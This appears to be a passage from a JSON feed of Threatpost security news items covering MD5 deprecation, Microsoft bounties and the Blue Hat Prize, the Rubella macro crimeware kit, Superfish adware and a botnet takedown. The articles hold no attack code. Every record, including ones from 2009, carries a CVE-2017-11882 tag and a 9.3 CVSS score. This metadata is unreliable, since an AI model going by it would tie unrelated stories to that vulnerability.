They must think [MD5] is out there more than we do to give customers that long of a runway of time.\u201d\n", "cvss3": {}, "published": "2013-08-14T14:25:38", "type": "threatpost", "title": "Microsoft to Eliminate Weak MD5 Crypto Algorithm", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-16T18:11:59", "id": "THREATPOST:856DD01A5D951BB0E39AE06B64DDD2A7", "href": "https://threatpost.com/microsoft-starts-countdown-on-eliminating-md5/101994/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:25", "description": "When Microsoft introduced use-after-free mitigations into Internet Explorer last summer, certain classes of exploits were closed off, and researchers and black hats were left to chase new ways to corrupt memory inside the browser.\n\nA team of experts from HP\u2019s Zero Day Initiative were among those who noticed that once-reliable exploits were no longer behaving as expected, and traced it back to a number of mitigations silently introduced in July into IE. By October, researchers Brian Gorenc, AbdulAziz Hariri, and Simon Zuckerbraun had developed attacks against two mitigations, Isolated Heap and MemoryProtection, and today announced they\u2019d been awarded $125,000 from the Microsoft Mitigation Bypass Bounty and Blue Hat Bonus for Defense.\n\nA chunk of that total, $25,000, was awarded separately for a submission suggesting a defense against the technique they submitted. The researchers said they will donate the full bounty to Texas A&M University, Concordia University, and Khan Academy, three institutions that sponsor strong STEM (science, technology, engineering and mathematics) programs.\n\n\u201cWe were very excited when we heard the results from Microsoft,\u201d Gorenc, ZDI lead researcher, said. \u201cWe put a lot of time and effort into that research. 
We\u2019re glad to hear Microsoft got good data out of it.\u201d\n\nGorenc said Microsoft has not patched the issues identified in the HP ZDI research, and as a result, Gorenc said ZDI will not disclose details yet. He did tell Threatpost that part of the attack includes using MemoryProtect as an oracle to bypass Address Space Layout Randomization (ASLR).\n\n\u201cWe use one mitigation to defeat another,\u201d he said. \u201cStuff like this has been done in the past, but what\u2019s interesting about this one is that these mitigations were designed to make use-after-free harder on the attacker, but what we\u2019ve done is made it defeat another mitigation that IE relies on; it weakens it in that perspective. It was interesting to see one used against another.\u201d\n\nUse-after-free vulnerabilities have overtaken buffer overflows as the hot new memory-corruption vulnerability. They happen when memory allocated to a pointer has been freed, allowing attackers to use that pointer against another area in memory where malicious code has been inserted and will be executed. Microsoft, for its part, has invested money and time into building mitigations against memory-related attacks, not only with the inclusion of mitigations in Internet Explorer, but also through its Enhanced Mitigation Experience Toolkit (EMET). For the most part[, bypasses of and attacks against mitigations have largely been confined to researchers and academics](<http://threatpost.com/bypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie/110570>), but some high-profile targeted attacks that have been outed do take into consideration the presence of these mitigations. 
Operation Snowman, for example, an APT operation against military and government targets, [scanned for the presence of EMET and would not execute](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>) if the tool was detected.\n\nInternet Explorer has been plagued by [memory corruption bugs](<http://threatpost.com/emet-av-disclosure-leak-plugged-in-ie/108175>) forever it seems, with Microsoft releasing almost [monthly cumulative updates for the browser](<http://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729>), which is constantly being used in targeted attacks and has been easy pickings for hackers.\n\n\u201cThe attack surface is valuable and has to exist,\u201d Gorenc said of IE and use-after-free bugs. \u201cIt\u2019s an attack surface where with slight manipulations, you can gain code execution on the browser.\u201d\n\nZDI, Gorenc said, has spent the majority of its money on the use-after-free attack surface; ZDI is a vulnerability program that rewards researchers who disclose vulnerabilities through its process. The bugs are shared with HP customers first and then with the affected vendors. ZDI said it has spent $12 million over the past nine years buying vulnerabilities.\n\nGorenc\u2019s colleagues Zuckerbraun and Hariri were external contributors before joining ZDI full time; both spent a lot of time on IE and use-after-free submissions, HP said. 
For these attacks, Zuckerbraun [reverse engineered MemProtect](<http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Efficacy-of-MemoryProtection-against-use-after-free/ba-p/6556134#.VNNkLC60CL0>), studying how it stymied use-after-free vulnerabilities. Hariri focused on [bypassing Isolated Heap](<http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/HP-Security-Briefing-episode-18-New-directions-in-use-after-free/ba-p/6659998#.VNNkNS60CL0>). Together with Gorenc\u2019s work on sandbox bypasses, the researchers soon had enough research to share with Microsoft.\n\nThe reward, meanwhile, will be donated to the three education institutions, each of which have personal meaning to the respective researchers and their focus on STEM.\n\n\u201cHP Security Research donates to organizations that have a strong STEM emphasis. We decided we would select organizations and charities to receive the money we won that support that emphasis,\u201d Gorenc said. \u201cWe look at it as a way to give back. Hopefully our research has made our environment better, hardened IE, and helps fund a strong engineering organization.\u201d\n", "cvss3": {}, "published": "2015-02-05T10:19:00", "type": "threatpost", "title": "IE Memory Attacks Net ZDI $125,000 Microsoft Bounty", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-12T17:07:39", "id": "THREATPOST:537857B2E29A08953D50AC9EDE93162F", "href": "https://threatpost.com/ie-memory-attacks-net-zdi-125000-microsoft-bounty/110876/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-04-25T05:50:07", "description": "A crimeware kit dubbed the Rubella Macro Builder is betting on a \u201cdirty deeds done dirt cheap\u201d approach to gain popularity in the criminal underground. 
The kit does two things: with a point-and-click builder functionality, it generates an initial malware payload for social-engineering spam campaigns; and it only costs $40 per month.\n\nRubella is not particularly high-achieving: It eschews the [exploitation of vulnerabilities](<https://threatpost.com/where-have-all-the-exploit-kits-gone/124241/>) for social-engineering techniques; its users take the well-worn route of sending out mail with Microsoft Word or Excel email attachments (with the goal of getting victims to enable malicious macros). It\u2019s not very aspirational either: Its humble intent involves generating fairly simple first-stage loader malware that threat actors can use for subsequent downloads and installations on targeted machines.\n\nHowever, the price is right, and it\u2019s got some attractive bells and whistles. A three-month license includes various encryption algorithm choices (XOR and Base64), download methods (PowerShell, Bitsadmin, Microsoft.XMLHTTP, MSXML2.XMLHTTP or a custom PowerShell payload), payload execution methods (executable, JavaScript, Visual Basic Script), and the ability to easily deploy social-engineering decoy themes.\n\n\u201cDespite being relatively new and unsophisticated, the kit has a clear appeal for cybercriminals: it\u2019s cheap, fast and can defeat basic static antivirus detection,\u201d said Flashpoint researchers, [in a blog](<https://www.flashpoint-intel.com/blog/rubella-macro-builder/>).\n\nCheap and easy: That phrase is music to criminals\u2019 ears everywhere, and no less so in the cyberworld. 
And indeed it\u2019s gaining traction: Flashpoint analysts determined that the criminal gangs behind the Panda and Gootkit banking malware each leveraged the Rubella first-stage loader as an initial attack vector in two recent but separate campaigns.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/04/26145144/Rubella.png>)\n\n\u201cIt is likely that the gangs are customers of the actor offering Rubella on the underground,\u201d the researchers said. \u201cSpecifically, the gangs behind the Panda malware distribution appear to have targeted customers through various social-media platforms, as well as an Australian financial institution through Panda\u2019s web-inject functionality.\u201d\n\nThe macro junk and substitution method appears to be relatively primitive, relying on basic string substitutions. Additionally, its copy/paste implementation of the Base64 algorithm is displayed in Visual Basic Script (VBS) code implementation. The code is obfuscated through general Chr ASCII values. But it lives squarely in the sweet spot for most financially motivated criminals, whose model relies on maximizing margins and volume. And the infection tactics, though arguably pedestrian, work.\n\n\u201cMicrosoft Office macro-based malware appears to still be threat actors\u2019 preferred method for obtaining initial access to compromised machines,\u201d Flashpoint researchers said. \u201cSuch Microsoft Office-based loader malware works well as an initial decoy\u2014disguising itself as a commonly exchanged Word or Excel document and impersonating normal Microsoft Office or Excel attachments\u2014and is generally spread via email attacks. 
While relatively unsophisticated, the Rubella Macro Builder represents a moderate threat to various networks.\u201d\n", "cvss3": {}, "published": "2018-04-26T19:33:48", "type": "threatpost", "title": "Rubella Crimeware Kit: Cheap, Easy and Gaining Traction", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-04-26T19:33:48", "id": "THREATPOST:45A8572FB3BCE9303EDEE2A4783994E3", "href": "https://threatpost.com/rubella-crimeware-kit-cheap-easy-and-gaining-traction/131474/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:28", "description": "**Emergency IE Patch** \u2013 Fri, January 9, 2009\n\nRyan and Roel dissect the latest wave of malware attacks against Microsoft Internet Explorer browser and discuss the company\u2019s plans to ship an emergency out-of-band update.\n\n[(Download episode)](<https://media.threatpost.com/wp-content/uploads/sites/103/2009/03/12025213/RyanRoel_episode7.mp3>)\n", "cvss3": {}, "published": "2009-03-18T16:35:05", "type": "threatpost", "title": "The Ryan & Roel Show Episode 7", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:10", "id": "THREATPOST:5BA927C1BD88B4949BDAEC1ACC841488", "href": "https://threatpost.com/ryan-roel-show-episode-7-031809/72718/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:05:06", "description": "LAS VEGAS\u2013In the face of mounting external pressure to begin paying bug bounties, Microsoft is instead launching a new program that will pay a $200,000 top prize to a security researcher who develops the most innovative defensive security technology. 
The program is designed to \u201cinspire researchers to focus their talents on defensive technologies,\u201d the company said.\n\nKnown as the Blue Hat Prize, after the company\u2019s regular internal research conferences, the program will focus in its first year on getting researchers to design a novel runtime technology to defend against memory safety vulnerabilities. Microsoft security officials said that rather than paying for individual bugs the way that some other companies such as Google, Mozilla and others do, they wanted to encourage researchers to think about ways to defeat entire classes of bugs.\n\n\u201cWhen we looked at the various economic incentive models, the bug bounty was among them. But when we looked at what researchers were doing with the bugs they found in our products across the board, we found that there were a lot more motivations for researchers than just money,\u201d said Katie Moussouris, senior security strategist in Microsoft\u2019s Trustworthy Computing Group. \u201cThere\u2019s recognition and there\u2019s what I call the pursuit of intellectual happiness, just the act of finding these issues.\u201d\n\nUnder the rules of the Blue Hat Prize program, any researcher 14 or older is eligible, and the researchers who win prizes will not only get the cash prize, but also will retain full intellectual property rights to the technology. The winners have to agree to license the technology to Microsoft, however.\n\nThe top prize is $200,000, with second prize paying $50,000 and third prize being a one-year MSDN subscription, which is worth $10,000. Microsoft also will fly the three winners to Black Hat next year.\n\nResearchers have been calling for [Microsoft to start a bug bounty program](<https://threatpost.com/does-microsoft-need-bug-bounties-050511/>) for several years now, and company officials have repeatedly said that Microsoft is not interested in paying for individual vulnerabilities. 
This new program gets around the semantics of all that by encouraging researchers to find a new way to mitigate attacks against an entire class of bugs. \n\n\u201cTwo examples of open problems that are suitable for consideration in this challenge are address space information disclosures and return-oriented programming (ROP). Note that you are not required to address these and you are not limited to these examples,\u201d Microsoft said in the rules for the program, which are on the [Blue Hat Prize site](<http://www.microsoft.com/security/bluehatprize/>). \n\nEntries are going to be judged by a panel of security experts from Microsoft teams, including the Microsoft Security Response Center, the Windows team and others. \n\nMoussouris said that Microsoft was looking for a way to inspire researchers to focus their talents on defensive technologies and not just finding bugs.\n\n\u201cThis seemed the best way for us to engage with the research community and protect customers simultaneously,\u201d she said.\n", "cvss3": {}, "published": "2011-08-03T17:34:12", "type": "threatpost", "title": "Microsoft to Pay $200,000 for Innovative Defense Technology in Blue Hat Prize Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:34:03", "id": "THREATPOST:C8BB08507CBCCE4C217C33C15D3AA04D", "href": "https://threatpost.com/microsoft-pay-200000-innovative-defense-technology-blue-hat-prize-program-080311/75507/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:04", "description": "[From Computerworld (Gregg Keizer)](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9133240>)\n\nAfter discovering attack code on a brand new Windows XP netbook, anti-virus vendor Kaspersky Labs warned users yesterday that they should scan virgin systems for 
malware before connecting them to the Internet.\n\nWhen Kaspersky developers installed their recently-released Security for Ultra Portables on an M&A Companion Touch netbook purchased for testing, \u201cthey thought something strange was going on,\u201d [said Roel Schouwenberg](<http://www.viruslist.com/en/weblog?weblogid=208187720>) [viruslist.com], a senior anti-virus researcher with the Moscow-based firm. Schouwenberg scanned the machine \u2014 a $499 netbook designed for the school market \u2014 and found three pieces of malware. [Read the full story](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9133240>) [computerworld.com]\n", "cvss3": {}, "published": "2009-05-19T15:38:56", "type": "threatpost", "title": "New Windows netbooks may harbor malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:14", "id": "THREATPOST:E65917E5AE555B95E6FFBD69E00E682D", "href": "https://threatpost.com/new-windows-netbooks-may-harbor-malware-051909/72668/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:14", "description": "\n\nScott Charney used his keynote speech at the RSA Conference on Tuesday to talk up a variety of hardware and software-based technologies meant to infuse the Internet with more trust. Charney, the head of Microsoft\u2019s Trustworthy Computing team, talked about the need for greater adoption of TPMs, code signing and identity systems, all of which the company has been discussing in various forms for the better part of a decade.\n\nMany of the technologies that Charney discussed, including the TPM and code signing, were part of the company\u2019s much-maligned and controversial Palladium project. Some of the technologies have been implemented in various forms in Vista and others are still forthcoming. 
But Charney said Tuesday that many of the problems that plague the Internet could be addressed with better trust on the part of users, machines, vendors and other parties.\n\n\u201cWe need alignment between political, economic and social forces and IT,\u201d he said. \u201cWe need trusted people, we need to know who we\u2019re dealing with online.\u201d\n\nMany of the machines that now run Vista include a TPM, which is a hardware module used to attest to the identity of the machine, as well as serve as a sealed storage area for cryptographic keys. \u201cWe have to root trust in the hardware because it\u2019s less malleable than software,\u201d Charney said.\n\nMicrosoft also is working on some new technologies, including the [Geneva server](<http://msdn.microsoft.com/en-us/security/aa570351.aspx>) which handles identity in a claims-based manner, Charney said. \u201cThis identity metasystem is the most controversial part because of privacy concerns,\u201d he said.\n", "cvss3": {}, "published": "2009-04-21T18:54:59", "type": "threatpost", "title": "Charney plugs Microsoft end-to-end trust at RSA Conference", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:23", "id": "THREATPOST:6C50260122AE142A1AA28DCFDE4EA98B", "href": "https://threatpost.com/charney-plugs-microsoft-end-end-trust-rsa-conference-042109/72565/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:16", "description": "Microsoft on Wednesday plans to launch a new research effort to determine the total cost of the patch-management cycle, from testing and distributing a fix to user deployment of the patch. 
The end result of the project, which will be completely open and transparent to outsiders, will be a full metrics model that the company plans to make freely available.\n\nThe metrics project will be handled by the analyst firm Securosis, which will do surveys and interviews with end users and will be responsible for building out the model. Rich Mogull, the firm\u2019s founder, said when Microsoft contacted him about the project he was encouraged by the open, product-neutral way in which the company wanted to approach it. \n\n\u201cThis is not a vendor tool. It\u2019s not product-focused at all,\u201d Mogull said. \u201cIt\u2019s focused on the organizations and the end users. We\u2019re looking at the patch management cycle. What are the total costs for the total cycle, from monitoring what you need to patch all the way to getting the patch out.\u201d\n\nAs part of the process, Securosis will be posting all of the correspondence between the firm and Microsoft about the project, inviting other vendors to participate and make suggestions and encouraging users to comment on the project as it progresses. Mogull said he hopes to have the first version of the model finished by the end of June.\n\nThe project is being driven on Microsoft\u2019s end by Jeff Jones, a strategy director in the company\u2019s Security Technology Unit. Mogull said that he and Jones have talked at length about the transparency and objectivity requirements around the metrics model.\n\n\u201cOur research model is radically transparent and that\u2019s how this is going to be too,\u201d Mogull said. \u201cEverything will be out in the open. I wouldn\u2019t do something like this if it wasn\u2019t. The goal for the project is to produce an objective, independent model, irrespective of Microsoft.\u201d\n\nMogull has created a separate [Web page](<http://securosis.com/projectquant>) to discuss the project, which is where the materials related to the effort will be available once it gets underway. 
He lists the goals and deliverables of the effort, which he\u2019s calling Project Quant for now, and emphasizes the open and transparent nature of the project.\n\n\u201cAll materials will be made publicly available throughout the project, including internal communications (the Totally Transparent Research process). The model will be developed through a combination of primary research, surveys, focused interviews, and public/community participation,\u201d Mogull writes.\n\n*Composite header image via [Robert Scoble](<http://www.flickr.com/photos/scobleizer/>)\u2018s Flickr photostream\n", "cvss3": {}, "published": "2009-04-15T11:45:37", "type": "threatpost", "title": "Microsoft to unveil patch management metrics project", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:21", "id": "THREATPOST:F28846A403C73C488A77B766A21BB3E5", "href": "https://threatpost.com/microsoft-unveil-patch-management-metrics-project-041509/72588/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:37", "description": "Dennis Fisher and Mike Mimoso discuss the latest security news, including the possible fork of TrueCrypt, Microsoft\u2019s new information sharing platform, the FBI\u2019s cybercrime task force and the US team\u2019s crushing tie with Portugal.\n\nDownload: [digital_underground_156.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_156.mp3>)\n\nMusic by Chris Gonsalves\n\n[](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2014-06-23T15:17:13", "type": "threatpost", "title": "Threatpost News Wrap, June 23, 2014", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-25T15:52:47", "id": "THREATPOST:415E19FC1402E6223871B55143D39C98", "href": "https://threatpost.com/threatpost-news-wrap-june-23-2014/106812/", "cvss": {"score": 
9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:57", "description": "Microsoft has taken steps to impede the next Superfish from impacting users.\n\n[Superfish was pre-installed adware](<https://threatpost.com/lenovo-superfish-certificate-password-cracked/111165/>) found on new Lenovo laptops earlier this year. The software exposes users to man-in-the-middle attacks because of the way it injects advertisements into the browser. It comes with a self-signed root cert that generates certs for HTTPS connections, replacing existing certs with its own in the process. Attackers could take advantage of this scenario\u2014especially after the password for the cert that shipped with Superfish was found\u2014to listen in on encrypted communication.\n\nMicrosoft this week said it has [updated its rules around adware](<https://blogs.technet.microsoft.com/mmpc/2015/12/21/keeping-browsing-experience-in-users-hands/>), and now such programs that build ads in the browser are required to only use the browser\u2019s \u201csupported extensibility model for installation, execution, disabling and removal.\u201d Microsoft said starting March 31, 2016 it will detect and begin removing programs that are not in compliance.\n\n\u201cThe choice and control belong to the users, and we are determined to protect that,\u201d wrote Barak Shein and Michael Johnson of Microsoft\u2019s Malware Protection Center.\n\nLenovo quickly patched the original Superfish issue and shortly thereafter, browser makers such as [Mozilla removed the root cert from Firefox\u2019s trusted root store](<https://threatpost.com/mozilla-pushes-hot-fix-to-remove-superfish-cert-from-firefox/111335/>).\n\nSuperfish\u2019s ability to perform SSL interception by proxy was certainly worrisome behavior from a supposedly trusted product, one that was suddenly opening the door not only to man-in-the-middle attacks, but also the manipulation of DNS settings and other 
network-layer attacks. Worse yet was that Superfish-like software would not trigger warnings about man-in-the-middle attacks.\n\n\u201cAll of these techniques intercept communications between the Internet and the PC to inject advertisements and promotions into webpages from outside, without the control of the browser,\u201d Microsoft said. \u201cOur intent is to keep the user in control of their browsing experience and these methods reduce that control.\u201d\n", "cvss3": {}, "published": "2015-12-23T09:01:25", "type": "threatpost", "title": "Microsoft Bans Superfish SSL Interception Adware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-12-23T14:01:25", "id": "THREATPOST:DD69574508B1751B9C9B01C26AE809C1", "href": "https://threatpost.com/microsoft-to-remove-superfish-like-programs-starting-in-march/115730/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:32", "description": "**By Rob Lemos**\n\nLAS VEGAS \u2014 If Jared DeMott hadn\u2019t been eager to take a different path, he would never be in security, much less a finalist in Microsoft\u2019s search for defensive technologies, known as the Blue Hat Prize.Raised in a manufacturing town, he was accepted to the Air Force Academy in 1996, but instead went to study computer networks at Ferris State University in Michigan. In 2000, he planned to take an offer with State Farm, a popular employer of Ferris\u2019s computer-science graduates, but instead went out to interview, and accept a job, with a government agency about which he knew nothing \u2014 the National Security Agency.\n\nAnd when it came to Microsoft\u2019s Blue Hat contest, DeMott shook off a lot of criticism from friends and colleagues for even considering looking at developing defensive technologies. 
Like many researchers in the security industry, he had focused on offense, not defense, regularly participating in capture-the-flag competitions. A year ago following the [announcement of the contest](<https://threatpost.com/katie-moussouris-microsoft-blue-hat-prize-082411/>) at the Black Hat security conference, a good friend from his hacking team told him to play to his strengths.\n\n\u201cBut then I went home and I started thinking about it more, and I thought, \u2018You know, I teach a class on application security, I do a lot more defense than I think I do,'\u201d he says. \u201cThe prizes weren\u2019t bad, and it would be neat to see if I could apply myself to defensive technologies.\u201d\n\nDeMott is one of three finalists vying for the $200,000 grand prize, the winner of which will be announced at a party on Thursday night here. In total, Microsoft had 20 qualifying submissions, the majority of which focused on mitigating return-oriented programming attacks \u2014 the topic of all three finalists\u2019 research efforts.\n\nROP allows attackers to create exploits by co-opting legitimate operating system functions and piecing them together to run code. 
The result of iterative development in the security community for more than a decade, ROP allows an attacker to [sidestep more modern operating system defenses](<http://blog.zynamics.com/2010/03/12/a-gentle-introduction-to-return-oriented-programming/>), such as non-executable memory \u2014 also known as data execution prevention \u2014 and code signing.\n\nIn this year\u2019s Pwn2Own contest, for example, security consultant Charlie Miller of Accuvant [used return-oriented programming](<https://threatpost.com/five-years-later-iphones-legacy-secure-062912/>) to get around non-executable memory on Apple\u2019s iOS mobile operating system to compromise an iPhone through a vulnerability in the Safari Web browser.\n\n\u201cReturn oriented programming is the technique that is being used in more and more real-world exploits,\u201d says Mike Reavey, senior director at Microsoft\u2019s Security Response Center. \u201cOne of the judging criteria was impact and whether the solution would block real-world impact.\u201d\n\nDeMott\u2019s entry into Blue Hat, known as \u201c/ROP,\u201d checks the target address every time that a procedure returns from executing code on the stack. While it\u2019s not a perfect defense, it has low overhead, executes quickly, and integrates well with Microsoft software, the company says.\n\nIvan Fratric, a teaching and research assistant at the University of Zagreb in Croatia, took a different approach. His proposal, known as ROPGuard, monitors a set of critical functions that are frequently used to implement return-oriented programming. When a function is called by a program, ROPGuard checks to see if the reference is legitimate or not.\n\nFratric, who has been researching security for nearly five years, first got interested in the field as a way to understand how hackers are able to manipulate computer systems. Prior to the Blue Hat contest, he had taken a more offensive approach, focusing on finding vulnerabilities. 
It took Microsoft\u2019s $200,000 prize and challenge to the security community to have him focus on developing better defenses.\n\nWith ROPGuard, Fratric aimed to use as much of the information available at runtime as possible. Figuring out when to do the checks was a major component of his technique. If the attacker is going to use ROP, then he typically calls specific functions to set up the system for his attack, Fratric says. For example, an attacker might call functions that make certain areas of memory executable or load a certain code component.\n\n\u201cThese functions are a great place to put these runtime checks,\u201d he says. \u201cMy approach uses runtime checks on these processes \u2014 some simple, some not so simple.\u201d\n\nFratric has already succeeded in getting his technology adopted by Microsoft. The software giant has already added four checks from ROPGuard to the [Enhanced Mitigation Experience Toolkit](<http://technet.microsoft.com/en-us/security/ff859539.aspx>), an optional software update used to harden Windows systems.\n\nThe last finalist, Columbia University PhD student Vasilis Pappas, has completed nearly six years of security research as part of his doctoral thesis. His submission, kBouncer, is the result of research that he had begun in the year before the Blue Hat announcement. The basic idea is it uses the kernel to police requests made by processes and reject anything that could be return-oriented programming.\n\n\u201cWhenever an application is requesting something from the kernel, kBouncer will check to see if it impacts security, and allow or deny the request,\u201d Pappas says.\n\nPappas grew up in Greece, attending university there before coming to the United States. A main attraction of the Blue Hat prize was to develop a technology that will be used by millions of people, he says. 
While researching the technology caused headaches for other finalists, the most difficult part of developing kBouncer was getting it to run on Windows, Pappas says. He is much more comfortable with Unix-based systems.\n\nThe contest has already paid off for each of the finalists and for Microsoft, says Reavey.\n\n\u201cBeyond the money, one of the things (all the contestants) want is to engage more actively in the security researcher community,\u201d Reavey says. \u201cIt certainly is good recognition for their efforts that they have been selected as finalists.\u201d\n", "cvss3": {}, "published": "2012-07-26T21:23:32", "type": "threatpost", "title": "From Three Nations and Three Different Perspectives, Blue Hat Finalists Focus on Defense", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-24T20:08:26", "id": "THREATPOST:9758835CBD1761636E1E39F36A79936B", "href": "https://threatpost.com/three-nations-and-three-different-perspectives-blue-hat-finalists-focus-defense-072612/76856/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:01", "description": "MIAMI BEACH\u2013It\u2019s been a decade now since Microsoft began focusing on product security as a top priority and there have been a lot of successes and some failures along the way. But in that time, one of the things that most definitely has changed as a result of the Trustworthy Computing program is how difficult and expensive it\u2019s become for attackers to compromise Windows machines. That\u2019s not to say, however, that the fight has been won. 
It\u2019s only beginning, in fact, a senior Microsoft security official said.\n\nThere are a lot of bits and pieces that comprise [Microsoft\u2019s Trustworthy Computing](<https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/>) efforts, from developer training to exploit mitigations to outreach to the security researchers who spend their time attacking the company\u2019s products. But the one thing that all of these initiatives have in common is that they\u2019re focused on increasing the time, effort and investment it takes for an attacker to compromise one of their products. Increasing that degree of difficulty and level of spending by even small increments can provide much larger gains on the defensive side.\n\n\u201cFor stealthy, reliable exploits, you need a lot of R&D and they\u2019re shorter-lived now. It\u2019s getting harder to find bugs and exploits,\u201d Andrew Cushman, senior director of Trustworthy Computing security at Microsoft, said in his keynote talk at the Infiltrate conference here Friday. \u201cThe defender\u2019s ethos is to increase attacker investment. Copy what works and keep plugging away. We\u2019re in this for the long haul.\u201d\n\nAlthough the famous directive from Bill Gates on Trustworthy Computing went out in 2002, one of the first real watershed moments in the company\u2019s efforts to lock down its products was the release of Windows XP SP2 in 2004. That was the first version of the OS to have the Windows firewall turned on by default, and included some other security upgrades as well. Cushman pointed to that as an inflection point for both Microsoft and the attackers who target its systems.\n\n\u201cPre-XP SP2 was the golden age for exploits. Things have only gotten harder since then,\u201d he said. \u201cThose were the days. It was then that the executives said, we\u2019re going to take the steps that are necessary to fix this.\u201d\n\nThose changes were not limited to Windows products, though. 
The company\u2019s IIS Web server was a frequent and easy target for attackers in the early part of the decade, and that fact did not escape senior management at Microsoft.\n\n\u201cOne of the low points of my career is when Jim Allchin stood up in a meeting and said IIS was a threat to Windows,\u201d Cushman said.\n\nThings have certainly changed since then, but that doesn\u2019t mean that all is sweetness and light for Microsoft or the Internet at large. Sure, it\u2019s become progressively more difficult to find and reliably exploit vulnerabilities in many platforms, but there are still plenty of other systems out there that haven\u2019t caught up. And though life may be more challenging for the dedicated attackers and offensive teams out there, they\u2019re not out of business by any means.\n\n\u201cAttackers are being squeezed from the top and the bottom. But low-skill exploits never go out of style. There\u2019s lots of low-hanging fruit out there, 1990s technology,\u201d Cushman said. \u201cBut for high skill exploits, the barrier to entry is growing. 
And there\u2019s no shortage of vulnerable technologies that are going to come online in the next few years.\u201d\n\nDespite all of the changes, Cushman said, one thing has remained the same throughout the years.\n\n\u201cAttackers are never going to go away,\u201d he said.\n", "cvss3": {}, "published": "2012-01-13T15:31:13", "type": "threatpost", "title": "Microsoft Aims to Make Life Harder, More Expensive For Attackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:00", "id": "THREATPOST:80978215EBC2D47937D2F3471707A073", "href": "https://threatpost.com/microsoft-aims-make-life-harder-more-expensive-attackers-011312/76094/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:45", "description": "Earlier this week, Microsoft released an announcement about the disruption of a dangerous botnet that was responsible for spam messages, theft of sensitive financial information, pump-and-dump stock scams and distributed denial-of-service attacks.\n\nKaspersky Lab played a critical role in this botnet takedown initiative, leading the way to reverse-engineer the bot malware, crack the communication protocol and develop tools to attack the peer-to-peer infrastructure. We worked closely with Microsoft\u2019s Digital Crimes Unit (DCU), sharing the relevant information and providing them with access to our live botnet tracking system.\n\nA key part of this effort is the sinkholing of the botnet. It\u2019s important to understand that the botnet still exists \u2013 but it\u2019s being controlled by Kaspersky Lab. In tandem with Microsoft\u2019s move to the U.S. court system to disable the domains, we started to sinkhole the botnet. Right now we have 3,000 hosts connecting to our sinkhole every minute. 
